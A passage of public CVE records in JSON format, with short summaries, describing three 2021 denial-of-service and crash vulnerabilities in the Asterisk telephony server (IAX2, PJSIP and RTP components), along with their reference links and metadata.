"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-32558",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-4999"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-32558",
"datePublished": "2021-07-27T05:19:34",
"dateReserved": "2021-05-11T00:00:00",
"dateUpdated": "2024-08-03T23:25:30.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-31878 (GCVE-0-2021-31878)
Vulnerability from cvelistv5 – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10
VLAI?
Summary
An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:10:30.837Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-07-27T11:10:28",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31878",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-31878",
"datePublished": "2021-07-27T05:17:05",
"dateReserved": "2021-04-29T00:00:00",
"dateUpdated": "2024-08-03T23:10:30.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26713 (GCVE-0-2021-26713)
Vulnerability from cvelistv5 – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33
VLAI?
Summary
A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T19:30:30",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26713",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26713",
"datePublished": "2021-02-19T19:30:30",
"dateReserved": "2021-02-05T00:00:00",
"dateUpdated": "2024-08-03T20:33:40.660Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}